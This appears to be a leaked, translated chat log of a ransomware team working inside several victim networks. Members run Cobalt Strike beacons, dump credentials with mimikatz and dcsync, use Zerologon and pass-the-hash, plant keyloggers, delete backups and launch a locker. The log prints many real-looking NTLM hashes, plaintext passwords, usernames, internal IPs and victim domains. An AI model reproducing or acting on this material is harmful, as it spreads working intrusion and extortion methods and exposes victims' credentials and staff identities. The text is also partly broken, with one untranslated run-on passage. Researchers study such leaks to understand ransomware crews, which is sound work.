                             *NDLEADING_EQUIP_Users
                             *NDLEADING_SD_Schedule
                             *NDLEADING_EQUIPPatch_
                             *NDLEADING_All_Email
                             *NDLEADING_SD_Managers
                             *NDLEADING_EQUIP_SDK_U
                             *NDLEADING_SD_Admins
                             *NDLEADING_SD_Technicians
                             *NDLEADING_ALL
                             *NDLEADING_Excel_Users
                             *NDLEADING_Citrix_Loca
                             *NDLEADING_EQUIPRDB-AL
The command completed successfully.
```
if
```
>trustAttributes: 0 []
```
then can we consider that the trust isn't working?
shell net user username /dom
output it, please
for the users we have
that's a last resort
zerologon?
well, that
since out of the 4 trusts only 1 is essentially alive, and that one pings with 100% loss
maybe this will save time
but I recommend the team learn the tool
it requires additional configuration, as you can see
lsassy comes in very handy
for the case when there are a certain number of creds
`ndmicjsater` `ndcarddalma` `nddevbernst`
no
didn't I send you this tool? https://github.com/Hackndo/lsassy
and I just sent it to the guys
nah. I collected everything I came across
did it work?
```
pth W08872612198 "Remote Support" 296c19b3d2cb8e8729e5fe27f6cf764a
Username : nddevbernst
Password : NDleading2021!
LEADMIN Deere0419!
```
```
Username : ndcartcarr
Domain   : JDOSSN
NTLM     : b25a68a3d5bc30ea97872f6b004c58be
SHA1     : d7a0e055c8e4b9947e48d99a66223a3dbe522bee

Username : ndmicjsater
Domain   : JDOSSN
NTLM     : c60a90ad0e486ae0efd1229b04824948
SHA1     : 450a811afd21b2f402b34575cbca7f386a3b2a47
DPAPI    : 5708598b47c3d8cea60c8bbd8d6d12bf

jason:1003:aad3b435b51404eeaad3b435b51404ee:c06bbf80fa38c366ca3803b9e922bdd4:::
Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:227a7d16ba750264459c885d666b7eaa:::

Username : ndcarhsherm
Domain   : JDOSSN
NTLM     : d7341bcb2ca0f8586c6f1974ead1ab1f
SHA1     : c7b7b0db23a67ce02082c6351720a1fc5ac40d69
DPAPI    : cfa41b24958547a50b0604ba6d0d04f6

Username : ndcardkolst
Domain   : JDOSSN
NTLM     : b9b6aa1456c1a351844910877a487cf9
SHA1     : efae1f6b171a18bf4b16231fcc32d23df10e538e
DPAPI    : a4dbe1e1a06257d0c44b1a009045169e

Username : ndcartcarr
Domain   : JDOSSN
NTLM     : 526ec72d381501fffb75e74934827f2f
SHA1     : 9ccae5674e564db712b7a9be8ebcba4d754f57c9
DPAPI    : c652bcd334907d5d084167b804d14ccf

* Username : ndcarrtedro
* Domain   : JDOSSN
* NTLM     : c9e553f47018e2be97ec3307bd47df25
* SHA1     : f6769930484ed5afd45e5aa95d1490e0fe2042e2

* Username : ndcarjjohns
* Domain   : JDOSSN
* NTLM     : 4178a0f16bad0c2a649398e88994568c
* SHA1     : ddc6c829305d0282c54b3fed400c67a999e71611
* DPAPI    : 4fdbb5025f3fec11c123375623d2287a

* Username : ndcarjjohns
* Domain   : JDOSSN.LOCAL
* Password : Ndleading11

* Username : nddevkodell
* Domain   : JDOSSN
* NTLM     : 1ae22c3e605fcb0a1d17d7c0b8509281
* SHA1     : 780ca6033c42c3b6ab91fd119e5a1b4c2db2696f
* DPAPI    : 0f4bacdbd1dc64f63ecfda1d9c05d690

* Username : ndcarddalma
* Domain   : JDOSSN
* NTLM     : db7aa0db0148b3b707b9ae6de91e3f25
* SHA1     : 9eaec33adae1e6193d9c381e449271008c5b0035
* DPAPI    : 830d9615902b542addd3faeeca02ba3e
```
good morning, country
user9
user8
@tl2 add 8 and 9 here
the domain hostname doesn't resolve, or it gets 100% loss?
it never came on even once
VPN?
```
eyJhbGciOiJBSOZdJej+HQUxGkLfwE47PNBlcVY5gpCszGI0B8JGEBEjaYYfWGMmRjxIL/OA+My9Eam/SwS6w5u3tuHdWvgE8MHaV9m41lLRFXJLfp+oI6mtpSZM1GvUMmMPRb6EdjioC1GX52kbuPOutrv2uatIfb4TIdld107GQ42OEOpX4evLdBdkBtrz17ob0wTqebQxGEBOh21ADZAzk4/9tbgbspvQaPahQttBzaWo4t8TVPwP39/sxLwtMm/DDv4ET0HZoF3torkbGe0pgRq6kCMZDeeePI6XTJzhLMDyUJzpfM3HTkxY3pxU03l+O3Bxgyve9MgfdoNcoKWPsjV1QxmLiUGyogc5QddtYfig64kBbRpBKzPpfb1lqVa5ktJiQkDx
```
that's it, my little bird went home...
there's one 2003. tried ms17, netapi, bluekeep, spoolss - all useless. Maybe 17-10 would work, but creds are needed there...
37 visible in total
there are hardly any visible computers there, I'll cross-reference now
6 of them
>operatingSystem: Windows Server 2003
then we don't wait for hashes)
and there's no password for the user
the domain only appeared today. I think I reported that yesterday. the domain is behind a VPN
day 2 at work and you've only pulled hashes?
at least SYSTEM is needed there. and of course it's too early to write it off, we only just started
let's write off the network right away
there is, the account at the entry point isn't a DA
hashes rarely crack
eternal rarely happens
well, rarely does anything happen there...
out of 5 people not one remembered?)
by the way, I forgot to check the descriptions. good thing you reminded me)
and the brute dictionary
and what about a local admin somewhere
well no, not among the admins either...
apparently the network scanner can..
not among the admins
```
>description: (Left 22/03/18) PW: L3av3r2018
```
who/what is this?
```
dn:CN=RCP Scanning,OU=Ireland,OU=Ball Users,DC=ballymoregroup,DC=local
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>cn: RCP Scanning
>sn: Scanning
>description: Scans123
```
with a 50% chance)
no, I'm still digging through the files.
but he has such a mess there that the password will get cracked faster))
[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=gB636LLSfv3w4ygbh)
just sitting and waiting?)?
is that a joke?
like what?
and everything else...?
the user has no rights anywhere, so we wait for the hashes...
VPN
```
server    REG_SZ    46.34.1.2:4433
domain    REG_SZ    LocalDomain
user      REG_SZ    rpearce
owner     REG_SZ    BALLYMOREGROUP\rpearce
```
DC
```
Server Name      IP Address
-----------      ----------
BALLY44HODC1     192.0.2.246
BALLY35303       192.168.3.159
EGDC2            192.168.200.160
BGAZRDC01        10.0.180.6
```
EA
```
Administrator
CITAdmin
```
DA
```
Administrator
AHarrison
amihhaljova
aseymour
bespadmin
CITAdmin
completeit
david.meadows
isobtchak
jay.newell
nreid
rdeason
sdunn
traubenheimer
```
domain creds go there
by the way, since the linux box is in the domain
that means there was a chain from the current one into timesavers and from there via the IT guys into linux
1.done,pkgprod.com
there's a network of 20 PCs there)
we go to the IT guys and look at them
there was also another domain there
```
192.168.5.99:445 (platform: 500 version: 6.1 name: RHEL8 domain: TIMESAVERS)
192.168.5.18:445 (platform: 500 version: 6.1 name: TSLINUX domain: TIMESAVERS)
```
more sessions came in there, so we take them into work or finish off the current open ones
Okay Cap
and for the future, damn it, we never rush
specifically from SYSTEM
specifically from windows system32
always launch from there
and for the future
Ran it from sys32
done
are you launching from under winlogon?
or they raised AV or something else
and look at the processes right away, is there some applocker?
drop it into C:\windows\system32
```
beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is 7376-91FE

 Directory of C:\hp

10/20/2020  02:36 PM                   .
10/20/2020  02:36 PM                   ..
02/09/2017  11:57 PM             9,662 csIcon.ico
08/15/2019  11:04 AM                   hpdiags
08/15/2019  10:57 AM                   hpsmh
02/11/2014  10:11 AM                   sslshare
10/20/2020  02:19 PM           189,440 start.exe
09/15/2016  12:46 AM             2,307 survey.dtd
10/20/2020  02:40 PM           189,440 Updater.exe
               4 File(s)        390,849 bytes
               5 Dir(s)  430,841,409,536 bytes free
```
yes
is the file in place?
where does the confidence come from that the WG has no backups?
+
from under SYSTEM?
right away
the file lands in the root right away
I don't know, the file doesn't appear. Maybe it runs for a long time
```
beacon> shell C:\hp\Updater.exe
[*] Tasked beacon to run: C:\hp\Updater.exe
[+] host called home, sent: 48 bytes
beacon> run C:\hp\Updater.exe
[*] Tasked beacon to run: C:\hp\Updater.exe
[+] host called home, sent: 35 bytes
beacon> execute C:\hp\Updater.exe
[*] Tasked beacon to execute: C:\hp\Updater.exe
[+] host called home, sent: 25 bytes
```
why?
the locker doesn't run on the DC
encrypt before it gets cut off, there are backups and VMs there
Everything is encrypted except the DC
while the domain isn't dead yet
look for access in the WG
more work
well, it's on them now)
```
02:09 PM
```
ideally it should only have been launched in about 4 hours
that's because there's no need to rush
This was found late
awesome)
Yes
Yes
and have you already started launching the build?
mm, now that's interesting)
```
[+] received output:
192.168.5.12:445
[+] received output:
192.168.5.13:445
[+] received output:
192.168.5.17:445 (platform: 500 version: 6.1 name: KEY2 domain: SAMBA)
192.168.5.18:445 (platform: 500 version: 6.1 name: TSLINUX domain: TIMESAVERS)
192.168.5.23:445
192.168.5.24:445
[+] received output:
192.168.5.25:445
192.168.5.26:445
192.168.5.27:445
192.168.5.28:445
192.168.5.30:445
[+] received output:
192.168.5.98:445 (platform: 500 version: 6.1 name: TSLINUX98 domain: WORKGROUP)
192.168.5.117:445 (platform: 500 version: 4.9 name: KEY domain: DMX)
[+] received output:
192.168.5.99:445 (platform: 500 version: 6.1 name: RHEL8 domain: TIMESAVERS)
192.168.5.188:445
192.168.5.229:445
[+] received output:
192.168.5.231:445
192.168.5.232:445
192.168.5.237:445
[+] received output:
192.168.5.240:445 (platform: 500 version: 4.9 name: TS-IX4A domain: WORKGROUP)
192.168.5.241:445 (platform: 500 version: 4.9 name: TS-IX4A domain: WORKGROUP)
192.168.5.242:445 (platform: 500 version: 4.9 name: TS-IX4B domain: WORKGROUP)
192.168.5.243:445 (platform: 500 version: 4.9 name: TS-IX4C domain: WORKGROUP)
[+] received output:
192.168.5.245:445 (platform: 500 version: 6.1 name: AS7004T-D8A5 domain: WORKGROUP)
192.168.5.246:445 (platform: 500 version: 6.1 name: AS7004T-D8E3 domain: WORKGROUP)
192.168.5.247:445 (platform: 500 version: 6.1 name: AS7004T-D8E5 domain: WORKGROUP)
192.168.5.248:445 (platform: 500 version: 6.1 name: AS7004T-D8BB domain: WORKGROUP)
Scanner module is complete
```
```
/FORCEUNINSTALL    Forcibly removes the McAfee Agent from the client system.
Example: FrmInst.exe /FORCEUNINSTALL
```
```
net share {sharename | devicename | drive:path} /DELETE
```
```
Share name   Comment
----------   -------
ADMIN$       Remote Admin
C$           Default share
IPC$         Remote IPC
NETLOGON     Logon server share
Shares
SYSVOL       Logon server share
```
how do I delete a share from the DC?
I'll move the group to 1.done
report back when you've set it up
accordingly into .exe, and something like start.exe or the like
well, it's .ex_ there
Does it need renaming? The extension?
don't forget that the DC goes last
we'll take it)
```
1CvlfdsVN58QacQDIsVVwk3cXrUrgRjXN3G4R1hrWSBzYkuyww5cteLGD4ryuGnv
```
Yes, but we need to decide with you which goes where
were you given the build?
1) by the time I got the messages the link was already invalid 2) I didn't order them
I wrote to you on the 16th
it needs to be prepared in advance
I don't have it either
that's exactly the point
Where would we get it? The faster we do it, the faster we move on to the others
and why right now?
the time isn't right
and do you have the build?
Need to lock faster
Disabled Defender
in general, get prepared
look up how to disable McAfee
well, are there any NASes there?))
http://www.pkgprod.com/
we'll set the build today
well, okay
[ ](https://mediaeveryone.com/group/pkgprod-com?msg=uRSXzYBQkq78kpC9L)
yes, and they have a website)
ty
There's a guy sitting at the PC doing business, issuing invoices for 2k$
```
pack3009
```
looks like just an AV lab)
Is there a way to check 5c9f2b00a6b5cd75dc76e2adb3369271
and there are no trusts
run a /16 rescan
there are like a PC and a half on the network...
I'll do it now
and did you re-pull the AD info?
```
2k12server - none
frontdesk - McAfee
pkg-101 - McAfee
timeclocksql - none
barbara-hp-2019 - McAfee, WinDef
sales2-hp-2019 - McAfee, WinDef
sales1-hp-2019 - McAfee
```
```
[+] received output:
192.168.168.5:22 (SSH-2.0-OpenSSH_4.3)
192.168.168.1:22 (SSH-2.0-OpenSSH_7.2)
```
uh-huh
These are two local users
```
500 Administrator 6f2cc106781ba05ddc908d6e32eb1838 66048
502 krbtgt d37d5fe30400ee01f2c2d09ba1b36d9a 514
```
You can always look at the LA
if you mean the administrator account, it isn't always the LA
Are you kidding?
In the dcsync\
and how did you find out the LA on the DC?
You can always get onto the DC if you have the local admin, which is in the dcsync
yes
but you got onto the DC first
Everything per the standard scheme
and put it back through setntlm
pulled logonpasswords and the old machine account hash was there
magic))
how?)
fixed it)
we're not looking for distant, quiet servers for nothing
they'll wipe it off the DC in no time
because the "hide in plain sight" tactic doesn't work here
why
under no circumstances do we persist on the DC
Need persistence on the DC
as soon as they spot it they may start cleaning the network
get in further away
beacon> pth pkgprod\linux 5c9f2b00a6b5cd75dc76e2adb3369271
Authentication through DA works
namely the Restore steps
https://github.com/dirkjanm/CVE-2020-1472
but we only have 1 DC here
there was an option to fire zerologon at one of the DCs, pull a dcsync, hop over to the neighboring DC, pull a hashdump and hope that replication hasn't happened yet and the old machine account hash is still there.
Put the old machine account hash back on the first DC
it worked before zero
```
beacon> shell net user "Administrator" /dom
[*] Tasked beacon to run: net user "Administrator" /dom
[+] host called home, sent: 60 bytes
[+] received output:
The request will be processed at a domain controller for domain pkgprod.local.

System error 5 has occurred.

Access is denied.
```
need to look for a solution to this issue
after using it
domain accounts won't work now
This is the DC admin
pass
```
mts9475!
```
without the domain?
beacon> pth .\Administrator 6f2cc106781ba05ddc908d6e32eb1838
yes
CNA variant?
no, through cobalt
but well done, did you do it via sharpzerologon?
let's structure the servers, AV, NASes, virtualization etc.
eh, then we're rushing)
did you do it via zero?
```
beacon> dcsync pkgprod.local
[*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:pkgprod.local /all /csv command
[+] host called home, sent: 438858 bytes
[+] received output:
[DC] 'pkgprod.local' will be the domain
[DC] '2k12server.pkgprod.local' will be the DC server
[DC] Exporting domain 'pkgprod.local'
502 krbtgt d37d5fe30400ee01f2c2d09ba1b36d9a 514
1135 zztest 6f2cc106781ba05ddc908d6e32eb1838 66048
1121 COMPUTER-1$ 9e4861eea9caaf03ab3741219905167e 4096
1125 JODY-PC$ 1be2a00d8363e7aa06a2be68e4e99576 4096
1117 PPCCOMP$ 1fe00279412bc69c535f95a6373c5a05 4096
1138 louisold fd5ee0e622e6f6c7526cc492cd509dc5 512
1143 timesavers eb026d6c093b199f57185a49a9fa324e 512
1148 micro2 1d414494cbe8c70c4321a26bfd6cc59b 66048
1131 DAN-HP$ d14820e4d9433a47e0ceddd48d0a06f6 4096
1130 louis fd5ee0e622e6f6c7526cc492cd509dc5 66048
1141 TONY-PC$ 9c906ae5277d876ace56baad914f0051 4096
1137 PKG-100$ 2817feb5c10f33de5e24b21737abf01b 4096
1119 SUE-PC$ 26efe407363f5d03e502639bd290659c 4096
1128 WENDY-PC$ f5439870ad6502228e07201dc7af491f 4096
1146 TELEMARKETING-H$ e068b3f3a033cd63d111c5bda50b3845 4096
1149 Spare 5af88c4732565f3cff7d8dd1f6ea314f 66048
1166 mtsi cdbb81ea052f92ce3e3a3208dfc2aade 66048
1165 PAC 3179b0258923f6e05ea684640e8e8a42 512
1150 Gretta 7b3785d867105a95e9cef80c4f7a722e 66048
1168 srivera c09783c159543b16d7c4830f743e3e60 66048
1127 jon 5af88c4732565f3cff7d8dd1f6ea314f 66048
1169 TED-LAPTOP$ 16be6f44317f74a831ee08618c6c4afd 4096
1123 TELEMARKET$ 3eb0a5d8c1a23495faa2d2c87b50d71e 4096
1129 JONM-PC$ dbeacb7d9a58c1bcc110c43bccace279 4096
1159 HP-TONY$ eec4fb89b81490d370b9d9ff6cfe1911 4096
1170 mhorgan 640d1d06d738a8ac7104f5ffe9343d5b 512
1140 linux 5c9f2b00a6b5cd75dc76e2adb3369271 66048
1151 FL1 1c145fb415625cbf7eb4a8079a8be5ef 66048
1142 tony 05b073daa9c1b3b909ff5ae2e4604bb5 66048
1132 rmg f0c158a0788788e5dc9e855a35020163 66048
1136 PKG-102$ 946d6fcb5d956bb6de2da361002d06a6 4096
1120 barb 50172476292c7784efcdf8da9d415a8f 66048
500 Administrator 6f2cc106781ba05ddc908d6e32eb1838 66048
1162 jess 9bed08d5afa9d00f06ff943c9fedd570 66048
1144 micro 1d414494cbe8c70c4321a26bfd6cc59b 66048
1116 telemkt 0dc70321eb7dd2aaf63d3e3f0d520dc3 66048
1139 PKG-101$ 57fd8fff3a57275d47ed819e98fb293d 4096
1133 frontdesk 5af88c4732565f3cff7d8dd1f6ea314f 66048
1118 jen 67ba48f6c118b9c433a79a40d1ba5984 66048
1152 FL2 1c145fb415625cbf7eb4a8079a8be5ef 66048
1147 TIMECLOCKSQL$ 4f4f2298cdbddb4564c82a43d570de2d 4096
1163 SALES1-HP-2019$ 511e98171aea1fa8da652bb7a4706523 4096
1134 FRONTDESK$ a4ef2d7813cc54616741cb7c09a0fbb9 4096
1160 BARBARA-HP-2019$ 17ad6d135f6f1a081e66b72e07541519 4096
1124 jody 13cdef39a416a4c50618630f7be02479 66048
1161 SALES2-HP-2019$ 83832d2cd61cfa87e26aee2548d6eced 4096
1126 wendy 9bed08d5afa9d00f06ff943c9fedd570 66048
1145 tele d7e35af358caba17dd77018cb86fb87d 66048
1167 Ted dd7a02d47fe222b5091ef2974c69b2ec 66048
1001 2K12SERVER$ 31d6cfe0d16ae931b73c59d7e0c089c0 532480
```
Creates zero-byte files
uh-huh, then we'll leave it for tomorrow
```
beacon> pwd
[*] Tasked beacon to print working directory
[+] host called home, sent: 8 bytes
[*] Current directory is C:\ProgramData\Adobe
beacon> run AdFind.bat
[*] Tasked beacon to run: AdFind.bat
[+] host called home, sent: 28 bytes
[+] received output:

C:\ProgramData\Adobe>adfind.exe -f "(objectcategory=person)" 1>ad_users.txt
```
AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials Terminating program. C:\ProgramData\Adobe>adfind.exe -f "objectcategory=computer" 1>ad_computers.txt AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials Terminating program. C:\ProgramData\Adobe>adfind.exe -f "(objectcategory=organizationalUnit)" 1>ad_ous.txt AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials Terminating program. C:\ProgramData\Adobe>adfind.exe -subnets -f (objectCategory=subnet) 1>subnets.txt AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials Terminating program. C:\ProgramData\Adobe>adfind.exe -f "(objectcategory=group)" 1>ad_group.txt AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials Terminating program. C:\ProgramData\Adobe>adfind.exe -gcb -sc trustdmp 1>trustdmp.txt AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials Terminating program. ```но не дает снять ад?все пингуютсяне проверяла он пинговался?при сьеме данных писал чтьо контроллер не доступенпросто дк недостуен?Я не нашел софта для впнхм, за впном?Домен не доступенкербы не снимаютсятут в сети есть эксч?ад инфо обновили? кербы пересняли и т дНе нашли кредов для перехода. 
The brute-force over the list was interrupted by the PC hanging
(it doesn't reach them, but for some reason it shows them
those aren't admin shares
it's a trap
there are admin shares
for now we're looking for other options
about cleaning the exe, we'll decide tomorrow
`C:\Users\jess\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1`
- nothing heard from them?
no sessions
after the close we're down a hundred thousand hours
I had two
unlikely, I'll check now
no
any sessions from Crisp?
the conf can go on `amgusa.org`
+ I'm being dumb (
`rawint.com` domain)
give me the cob
somehow too many networks got screwed up
well if it's off, then give me a network too
#skytechinc-com looking for the esxi ones
#henrystreet-org looking for vSphere creds
so what are you busy with?
Hi
user3 is stuck in traffic, otherwise everyone's here
everyone here?
Hi
:space_invader:
hi all
good night
see you tomorrow
tomorrow by 5
okay then that's all for today
ah, got it
there are 5 of them on the network
no, there are only three in vSphere
maybe reset?
oh and there's one set of creds from the trust
in #corp-televisa-com-mx I got going and got onto a server, got new creds; tomorrow when the guy is available I'll get persistence on another box and I think I'll get onto the DC after all
left to find creds for two esxi and everything's ready
skytechinc.com: found two more NASes with backups, 4 in total; found vSphere creds, there are three esxi there, but there are 5 on the network, need to find passwords for 2 more
in #henrystreet-org ports scanned and all web frontends checked, found esxi and vSphere, creds in progress. Of at least something worthwhile I found:
report what you did today
just leave the proxy that was issued for the mail
wind down the server sessions and the rest
looks like this is for Monday
fresh ones
dump their browsers for me one more time
```
CurrentUser : WATERWAY\mharper
Idletime : 00h:46m:59s:672ms (2819672 milliseconds)
```
```
CurrentUser : WATERWAY\gkeller
Idletime : 02h:09m:38s:235ms (7778235 milliseconds)
```
```
CurrentUser : WATERWAY\mapusatera
Idletime : 06h:51m:32s:968ms (24692968 milliseconds)
```
```
CurrentUser : WATERWAY\djarden
Idletime : 03h:05m:02s:093ms (11102093 milliseconds)
```
screenshots - lock screen
no movement?
if they don't come we wrap up until Monday
we monitor for half an hour
on the servers, put the sessions to sleep on a longer interval for now
I still hope they'll come
let's push readiness back by half an hour
they bailed a bit early....
that's gkeller
```
====== IdleTime
CurrentUser : WATERWAY\gkeller
Idletime : 01h:43m:42s:781ms (6222781 milliseconds
```
one minute
Greg specifically
the rest alive?
fuck
comp off
7
harper left
5 min readiness
no
do we have Slack access?
@ot wake up, we lost you
give me a screenshot from harper
where's our office team?
take screenshots regularly and check for any alarm
you watch the active admins
we'll write in 10 min
10 min
yeah, great
we'll pull in the servers now
what else was there from the backups?
batch files ready, disk share ready, nimbles open
nimble
ncentral and rackspace at the ready
? do you know what to prepare?
readiness 10 min
problems with the VPN for now
yes
your batch deploy kills the processes, right?
servers
sending access to 3 dedicated servers
no
didn't find the Asus backup?
we'll ping everything now and be ready
thanks @user4
there's been SharpSharesNG for a long time
you can prepare the share-script deploy automation right away
or if the cob gets dropped you'll have the VPN
launch the build right away
so that if things get hot (you'll be monitoring the admins)
and you'll already be holding sessions on the servers by then
so we'll tunnel a VPN into the network
there's a chance)
I already said
won't they kick us out right after the email about the nimbles?
questions?
all 5 people are in, divide the roles among yourselves
everything on timing, everything has to be done almost instantly
don't forget about deleting all the external backups there were
in case the cob gets dropped
i.e. you run the dll on the box, I give you ovpn configs + a dedicated server, you bring it all up and you're on the network via VPN
2 entry points
for that case I'm preparing VPN bridges into the network for you
important point: during an alarm the cob may get thrown off the network
ah, yes, ok
and you won't even have to map)
you can share the workstations over the network
so timing is very important here
but an alarm may go up and we'll have little time for the lock itself
+ mapped workstations?
or we lock without the nimble
and lock
either we get the nimble password and remove all the backups
it's all simple here
so that you only launch the build
by that time you must have all the servers pulled into the cob
got the access, logged in immediately, screenshotted the backups with file sizes if there are any, and deleted everything you can
and you wait for access so as to do everything in +- 1-2 minutes
i.e. socks + URL entered
you prepare the nimble access right away
```
per AD total boxes - 310
win serv - 16
hyper-v server - 7
workstations - 287
```
from the two I sent
give one build right here
how many servers and how many user machines?
okay, let's go over the strategy
timeout 30 minutes
I saw
yes
djarden, did you check her browser?
mharper
whose desk?
everything works, don't confuse me
there's a keylogger on her
yes
did you look at her box?
```
dn:CN=Dianne Jarden,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>nc: Dianne Jarden
>sn: Jarden
>description: IT
```
I'll find valid ones now
error
it gives an error
```
blue
gkeller
mharper
mpusatera
```
who had the nimble?
@user7 how much longer?
I need his mail and the mail of the second little shit
help tickets get created there or something like that
I think it's HelpDesk
*his
in any case I pulled it from him
that's mharper
I don't think he's a real person
they're mostly with @user7, he stepped away
`setg Proxies socks4:185.150.189.165:29528`
for now give me the socks and access to connect to the guys' mail about the nimble
in Slack?
quiet on the mail?
nothing in the keylog
well, unless they're running around the office yelling
did they raise an alarm?
monitor the admins
both web and ssh
er, that's not brute over there
the ip goes into lockout after +- 10 attempts
same as root
in the logins
admins also with a capital letter
throw a kill of the asus backup service process into the pre-lock batch
in an hour we discuss the action plan, since the approach here isn't trivial
yes
not yet, we'll do it soon
was there also an archive with files here?
we start at 1:30
https://192.168.0.75/#/login
on the mail
I only saw an alert about a successful login from '20
so there were alerts before that too?
actually, a question before the brute: they have an email alert on login, there's a high chance there will also be an alert on brute-force\lockout\wrong password; is it worth it?
admin, administrator and root
the logins of these two morons
I think max range 5 variants
it's unclear which login variant is needed
the problem is also that I tried different login variations (with @, \, and just the login)
let's get back to the brute-force idea
they say monitoring shows they're in a workgroup, like us
so maybe it's a workgroup then?)
can't see it in ad_comp
is it in ad_computers?
@user9
```
nimbles:
https://192.168.0.42
https://192.168.0.43
https://192.168.0.75
https://192.168.0.77
```
is it even in AD as such? is the nimble in the domain?
possibly unlimited
on the other hand, how many login attempts did we make on the nimbles
tied to AD
but by known ones
that's in the domain
is that on the nimble?
```
Lockout threshold: 15
```
is there an unlimited number of attempts there?
+ all the hashes from the domain and we'll brute them
let's collect the top passwords from the last couple of years
even 16
honestly, AD and the servers are a total dump
we dumped AD as soon as we got the network
that's how it was, per AD
17 servers? was it that many before? or did they sniff something out?
Regarding backups on the network: all computers with "backup" in the name either don't ping or are unreachable. The few that are alive only have a C drive and there are no backups there. 17 servers in total; of backups I only found database backups, the site, etc. I'll check the workgroup too of course, but I get the feeling they dump backups to the nimble or don't make them at all :) which is unlikely, since the computers labelled backup give the impression they were restored from a backup, which is why they're named that
that's how you'll get caught)
```
Teemo[WWSQL]SYSTEM */976|2021Jan15 03:11:21> portscan 192.168.0.105 1-10000 icmp 1024
[Tasked beacon to scan ports 1-10000 on 192.168.0.105
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
```
```
Teemo[WWSQL]SYSTEM */976|2021Jan15 03:09:54> shell net view \\192.168.0.105 /all
[*] Tasked beacon to run: net view \\192.168.0.105 /all
[+] host called home, sent: 60 bytes
[+] received output:
System error 53 has occurred.
The network path was not found.
```
net view doesn't work, no 3389, didn't check other ports
rdp?
```
Description = The RPC server is unavailable.
```
and what about rpc and net view?
backups without 445
```
beacon> shell ping -n 1 CLEBACKUP.waterway.com
[*] Tasked beacon to run: ping -n 1 CLEBACKUP.waterway.com
[+] host called home, sent: 75 bytes
[+] received output:
Pinging CLEBACKUP.waterway.com [192.168.0.105] with 32 bytes of data:
Reply from 192.168.0.105: bytes=32 time=7ms TTL=64
Ping statistics for 192.168.0.105:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 7ms, Maximum = 7ms, Average = 7ms
beacon> portscan 192.168.0.105 445,21,22,3389,443
[*] Tasked beacon to scan ports 445,21,22,3389,443 on 192.168.0.105
[+] host called home, sent: 75377 bytes
[+] received output:
(ICMP) Target '192.168.0.105' is alive. [read 8 bytes]
[+] received output:
Scanner module is complete
```
check
by the way, a very interesting thing.... but it somehow doesn't compile, digging through the code
there's this thing, in theory it should work - https://github.com/amitwaisel/Malproxy/tree/master/src
patched in the lab)
tried mimi via socks and as expected it didn't work; can't deploy a VPN - Cobalt's doesn't deploy since Win 10 isn't supported. They don't use any other VPN client.
so yes, it makes sense to try
by the way, as far as I remember the DC in the lab isn't patched
but you need to be fully sure it'll work)
in principle we can try it in the lab
nope, didn't try
if I try now, there's a big chance they'll clean the network, because
if it doesn't work now and the DC breaks a second time, the admins will suspect something)
```
this line doesn't work, apparently because CS has an old mimikatz
```
and didn't you try to get it going via socks or VPN?
smbghost across the network - nothing
Just need to populate it
Set up the forum, configured it.
and tomorrow by 11
post today's results in the groups
by 11 at the latest we can
OK, worth going at 1:30
That's a very bad time
why so early?
tomorrow by 10
by 9
not long today
moving through the computers
how's it going for you?
scanning the subnets from ad_subnets - looking for where I'm admin
reading the PowerShell Empire docs
report progress on tasks
what I did
well, we'll sort it out with you then
looks like it
so only @user8 is free?
I'm with the same session
well then ok
bringing up the forum
I have asu.edu
the rest?
apparently I personally have no task yet
finished with the VPS literally a couple of minutes ago, reported on the networks
what about your tasks?
:space_invader:
hi
hi all
hi
that's the one that's NAS-D5-E2-B8
only now)
I'm in all of them
go into the other rock
ah, got it
we're catching them with keyloggers
and get onto the nimble via social engineering
they'll be calling, writing into the void
nimble?
the nimble will be at 4
not before 6 there
fine, you're right, but I'll add that when I talked about the exe I was allowing for outcomes like this)
it's not my fault trick knows how to eat dlls)
don't kick a man when he's down)))))
what about ditching the exe and fuck it
how come...
yeah got it, please ping me when they're going to load - I've got interruptions with cases for the online guys today( they have nothing to work with( I was thinking of grabbing something from trick
but there's no clean exe....
we agreed last week and I confirmed today
the target said it'd be, yes?
loading, from where no idea
I read today there'll be some new cases? will they load from BK?
how are you there?
hi
hi
for now please play around with testing the tools
sorry friends, a bit of a stall with sessions for now, probably resolved in a couple of hours, maybe sooner
if only they'd give new sessions (
ok
I'll try to rustle some up now, the backdoor just fell off, the domain the callback went to
all the ones that were alive are dead?
good night
Good evening
good afternoon
No sessions. Will there be new ones?
good morning
:flag_il:
Hi
night
night all
```
https://vpn.floridapoly.edu
```
on the dedicated server under the VPN I checked the network for ms17\bluekeep\smbghost (selectively) - all misses; one option left is to somehow find the DC and check it for zerologon
so we'll be here until late
we'll be closing the network
tomorrow by 3
post statuses in the groups
tried several versions, ms17 doesn't work
On mine - scanned the network, there's 1
```
Host is likely VULNERABLE to MS17-010!
```
but
```
[-] 10.200.101.73:445 - RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30)
```
post status in the groups
made only 2 snapshots
whoever finished the RDP, post the password and that a snapshot can be made
@tl1 add me to @user4's group please
Waiting until you restore the dedicated server, packing all the keepass data,
and how do I make it so I can connect over 9000 with the VPN?)
like yesterday
digging around in the dedicated server, deploying the VPN for yesterday's network
who's doing what?
that's about the RDP setup
don't create new users, change the password and work under the current one
no less
ok, from 24
24 too few? I already set it
